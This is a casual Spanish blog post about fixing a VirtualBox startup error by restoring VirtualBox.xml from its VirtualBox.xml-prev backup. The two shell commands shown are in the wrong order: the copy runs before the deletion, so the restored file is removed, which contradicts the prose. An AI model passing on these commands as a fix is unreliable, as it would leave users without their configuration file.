Leer Mas
Buenas hoy ya Dormingo y comenzamos nuevamente con las entradas diarias en el Blog si lo leen bien SniferL4bs vuelve para ello comenzamos con el siguiente error en el querido y estimado virtualBox el cual me salto de la nada, bueno creo saber porque elimine el VirtualBox.xml o anda corrupto algo tenia que hacer :( Snifer me llamo lo se ya ando volviendo y lo primero que hago es matarlo. 
La verdad desde anoche andaba con este error, lo que procedi a arelizar de manera automática  ya que andamos acostumbrados en andar, y tener este tipo de errores fue desinstalar VirtualBox, luego de ello volver a instalar, instalar purgear sus dkms instalar virtualbox ose ¬_¬° y despues de todo nada, ya cansado  y a punto de mandarlo a la fuck!! completamente se me ocurrio leer nuevamente el error :$.  
Si lo volvieron a ver ya encontrarón la respuesta cierto?. Si no fuese el caso lo que procedi a realizar fue lo siguiente irme a /home/snifer/.VirtualBox/

Lista de directorios de .VirtualBox
Al ingresar note dos archivos importantes el VirtualBox.xml y VirtualBox.xml-prev así que con una logica simple y corta xD por asi decirlo debi haber pensado mucho mas antes, fue eliminar el   VirtualBox.xml y reemplazarlo por el VirtualBox.xml-prev  si no comprenden hacen lo siguiente.

snifer@nevaeh:~/.VirtualBox$ cp VirtualBox.xml-prev VirtualBox.xml
snifer@nevaeh:~/.VirtualBox$ rm VirtualBox.xml



Y tachin!! por arte de magia VirtualBox funcionando correctamente, bueno señores primer dia que ando solo en tierras nuevas.

Regards,

Leer Mas